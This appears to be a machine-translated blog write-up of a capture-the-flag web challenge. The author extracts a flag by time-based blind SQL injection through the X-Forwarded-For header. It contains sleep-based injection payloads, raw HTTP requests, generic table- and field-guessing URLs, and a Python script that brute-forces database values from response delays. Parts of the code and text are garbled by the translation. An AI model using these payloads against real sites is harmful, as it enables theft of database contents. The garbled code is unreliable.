Record the experiment. CTF Library who is? Process

First of all, I admit I saw what other people did.

Because I have no experience, although I know that Echo is caused by the x-forwarded-for parameter, but it has not been available so I looked at the demo.

Because it involves writing a script to record the injection process, I hereby record

I saw 2 demos. The most straightforward one is to use the AWVS scan and then the Python sweep because I don't think I have the skills to find the right injection. Learn to use tools first


Although others wrote with Awvs but began to scan no matter how the scan is not come out later. A simple approach turns out to be this:

650) this.width=650; "Src=" Http://s1.51cto.com/wyfs02/M00/8A/D5/wKiom1g88i7CtXI2AAFP0n0eUMc967.jpg-wh_500x0-wm_3 -wmp_4-s_714539186.jpg "title=" qq picture 20161129111448.jpg "alt=" Wkiom1g88i7ctxi2aafp0n0eumc967.jpg-wh_50 "/>

So simple, and then I found out that it was possible to inject it. It's like it's a time delay. Unfortunately, no system learning does not understand the post-replenishment learning content

The content given is:
Tests performed:

• (select (0) from (Select (Sleep (6)) v)/* ' + (SELECT (0) from (Select (Sleep (6))) v) + ' "+ (select (0) from (Select (Sleep (6))) v) + "* * = 6.053 s

• (select (0) from (Select (Sleep (0)) v)/* ' + (SELECT (0) from (Select (Sleep (0))) v) + ' "+ (select (0) from (Select (Sleep (0))) v) + "* * = 0.062 s

• (select (0) from (Select (Sleep (3)) v)/* ' + (SELECT (0) from (Select (Sleep (3))) v) + ' "+ (select (0) from (Select (Sleep (3))) v) + "* * = 3.042 s

• (select (0) from (Select (Sleep (9)) v)/* ' + (SELECT (0) from (Select (Sleep (9))) v) + ' "+ (select (0) from (Select (Sleep (9))) v) + "* * = 9.033 s

• (select (0) from (Select (Sleep (0)) v)/* ' + (SELECT (0) from (Select (Sleep (0))) v) + ' "+ (select (0) from (Select (Sleep (0))) v) + "* * = 0.047 s

• (select (0) from (Select (Sleep (0)) v)/* ' + (SELECT (0) from (Select (Sleep (0))) v) + ' "+ (select (0) from (Select (Sleep (0))) v) + "* * = 0.047 s

• (select (0) from (Select (Sleep (0)) v)/* ' + (SELECT (0) from (Select (Sleep (0))) v) + ' "+ (select (0) from (Select (Sleep (0))) v) + "* * = 0.046 s

• (select (0) from (Select (Sleep (6)) v)/* ' + (SELECT (0) from (Select (Sleep (6))) v) + ' "+ (select (0) from (Select (Sleep (6))) v) + "* * = 6.052 s

• (select (0) from (Select (Sleep (0)) v)/* ' + (SELECT (0) from (Select (Sleep (0))) v) + ' "+ (select (0) from (Select (Sleep (0))) v) + "* * = 0.063 s

Original value: 1

Then use the HTTP editor to test

The simplified get data is

get/web/wonderkun/http/1.1

X-forwarded-for:1 ' + (select 1 from (Select (Sleep (5)) v) + '

referer:http://ctf5.shiyanbar.com/web/wonderkun/index.php

Host:ctf5.shiyanbar.com

This is effective.

Repeated changes should be done in the Select (Sleep (5)) modification

Because I accidentally saw the demo with a case statement, I used this statement on the test machine to test the following:

Select Case when (select Length (test) from AAA) then sleep (2) Else sleep (0) end

is valid.

Replacing get data still works

And then I thought about the experiment. Basically, the table field is flag, so I'll try and see if I can.

The GET request is:

get/web/wonderkun/http/1.1

X-forwarded-for:1 ' + (select 1 from (select-Length (flag) from-flag) >10 then sleep (2) Else sleep (0) end ) (v) + '

referer:http://ctf5.shiyanbar.com/web/wonderkun/index.php

Host:ctf5.shiyanbar.com

And then you start judging his value, but it seems like you need to use a loop function to guess the solution. But he gave the demo, but he did it himself.

First of all, I know that table fields just need to guess the field data length and each letter of a field.

First Baidu how to guess field data length content as follows:

1. Guess the table name:
http://xxx.com/test.asp?id=123 and (SELECT COUNT (*) from admin) >=0//Guess if there is a table admin
2. Guess the field name:
http://xxx.com/test.asp?id=123 and (select COUNT (adminname) from admin) >=0//admin table for fields AdminName
3. Guess the length of the field:
Select the first record from the admin table to get the AdminName field length for this record
Http://xxx.com/test.asp?id=123 and (select top 1 len (adminname) from admin) >=0
Http://xxx.com/test.asp?id=123 and (select top 1 len (adminname) from admin) =7//Field AdminName length 7
4. Guess the value of the field:
Select the first record from the admin table, guessing the value of the field AdminName, until 7
Http://xxx.com/test.asp?id=123 and (select top 1 ASC (Mid (adminname,1,1)) from admin) =97
Http://xxx.com/test.asp?id=123 and (select top 1 ASC (Mid (adminname,2,1)) from admin) =78
Http://xxx.com/test.asp?id=123 and (select top 1 ASC (Mid (adminname,3,1)) from admin) =96
..........
Http://xxx.com/test.asp?id=123 and (select top 1 ASC (Mid (adminname,7,1)) from admin) =102

First guess the length of the field

Field length guessing should be manual quickly

Repeat greater than less than is expected to be 32 characters (the top with the Len doesn't seem to be the database is not the same as I use the length)

get/web/wonderkun/http/1.1

X-forwarded-for:1 ' + (select 1 from (select-Length (flag) from flag) = [+] then sleep (1) Else sleep (0) end ) (v) + '

referer:http://ctf5.shiyanbar.com/web/wonderkun/index.php

Host:ctf5.shiyanbar.com

Here's the tool I'm using. Awvs HTTP Editor

650) this.width=650; "Src=" Http://s1.51cto.com/wyfs02/M00/8A/D7/wKiom1g9G3mxD7NIAAHg8wEQ5_U736.png-wh_500x0-wm_3 -wmp_4-s_3730856843.png "title=" Qq20161129141057.png "alt=" Wkiom1g9g3mxd7niaahg8weq5_u736.png-wh_50 "/>

Then continue to write the validation string on the test machine SQL but I'll start by creating a mock-up table.

Just found if also should be able to do without using case if looking clearer

Select if (select Length (flag) from flag) = 32,sleep (1), sleep (0));

Unfortunately I replaced it with the sleep failure hey continue to see how to judge I'm the only one that should be able to use

Select substring (flag,2,1) from flag it should be possible to use the SUBSTRING function this should be the same as mid.

Try to follow the convention should the value should be flag{} this way. Try it.

get/web/wonderkun/http/1.1

X-forwarded-for:1 ' + (select 1 from (SELECT-substring (flag,1,1) from-flag) = ' F ') then sleep (1) Else Slee P (0) end) v) + '

referer:http://ctf5.shiyanbar.com/web/wonderkun/index.php

Host:ctf5.shiyanbar.com

But does it seem like time is not 1S guess it failed? Think of the next just if it is not effective
echo of if:
Your IP is:1 ' + (select 1 from (Select if flag) = 32

It looks like it's starting to get truncated.

It seems that the comma cannot go forward without resolving ...

Keep searching for information.

Http://www.91ri.org/12168.html

Have to admire the power of resources

Modified Request:

get/web/wonderkun/http/1.1

X-forwarded-for:1 ' + (select 1 from (SELECT-SUBSTRING (flag from 1 for 1) from-flag) = ' F ') then sleep (1) else Sleep (0) end) v) + '

referer:http://ctf5.shiyanbar.com/web/wonderkun/index.php

Host:ctf5.shiyanbar.com

And then I tried it. I changed the back sleep (0) to 5 effect.

Start writing scripts

(First you need a Python instance manual)

Search for request and see how get requests are written and add header information

650) this.width=650; "Src=" Http://s5.51cto.com/wyfs02/M02/8A/D3/wKioL1g9IDOiYyvGAABm5layf-k990.png-wh_500x0-wm_3 -wmp_4-s_1423926252.png "title=" Qq20161129143052.png "alt=" Wkiol1g9idoiyyvgaabm5layf-k990.png-wh_50 "/>

A

Because a duplicate call may be required to encapsulate a method first

I do not know {} How to add so also Baidu a bit

Then it should be how to judge the time only needs to be executed before and after the execution should be able to then the whole cycle should be able to handle


The following code can be completed with comments:

#-*-Coding:utf-8-*-

Import requests

Import time

#定义个方法返回时间时间差 var is defined as the number of digits to guess the solution character num

def test (Var,num):

#url链接

url = ' http://ctf5.shiyanbar.com/web/wonderkun/index.php '

#头信息 x-forwarded-for Insert Variable

headers = {}

#X-forwarded-for Specifies that if the character is to sleep for 5 seconds

headers[' x-forwarded-for ']= "" "1 ' + (select 1 from (SELECT-SUBSTRING (flag from" "+str (num) +" "" for 1) fro M flag) = ' "" "+str (Var) +" "") Then sleep (5) Else sleep (0) end) v) + ' "" "

headers[' Referer ']= ' http://ctf5.shiyanbar.com/web/wonderkun/index.php '

headers[' Host ']= ' ctf5.shiyanbar.com '

#执行前时间获取

Time_start=time.time ();

R = Requests.get (url,headers=headers);

#执行后时间获取

Time_stop=time.time ();

#返回时间差

return int (time_stop)-int (Time_start);

#定义testChar as a string dictionary

testchar= ' [email protected]_. {}-‘

#手工检测出32位进行循环猜解 first enter the number of strings that a loop cracked

For x in Xrange (1,33):

#循环单个破解的字

For J in Testchar:

#判断时间差是否大于等于5

if test (j,x) >= 5:

#破解后字符

Print str (x) + ': ' +str (j)

It's worth noting that xrange 1,33 I started writing the wrong 32 results only out of 31 values ... There is this question did not say ctf{} expand the pit Ah!!

Problem:
http://ctf5.shiyanbar.com/web/wonderkun/index.php

This article is from the direction of the road. Confused "blog, be sure to keep this source http://qidai.blog.51cto.com/6435621/1877775

Record experiment. CTF library who is? Procedure